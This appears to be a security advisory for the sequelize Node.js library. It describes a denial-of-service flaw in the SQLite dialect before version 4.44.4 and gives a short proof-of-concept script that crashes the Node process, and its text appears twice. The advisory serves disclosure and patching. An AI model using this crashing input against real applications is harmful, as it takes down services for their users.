Versions of sequelize
prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError
exception for the results
variable. The results
value may be undefined and trigger the error on a .map
call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.
The following proof-of-concept crashes the Node process:
const Sequelize = require('sequelize');
const sequelize = new Sequelize({
dialect: 'sqlite',
storage: 'database.sqlite'
});
const TypeError = sequelize.define('TypeError', {
name: Sequelize.STRING,
});
TypeError.sync({force: true}).then(() => {
return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});
Recommendation
Upgrade to version 4.44.4 or later.
References
Versions of
sequelize
prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch aTypeError
exception for theresults
variable. Theresults
value may be undefined and trigger the error on a.map
call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.The following proof-of-concept crashes the Node process:
Recommendation
Upgrade to version 4.44.4 or later.
References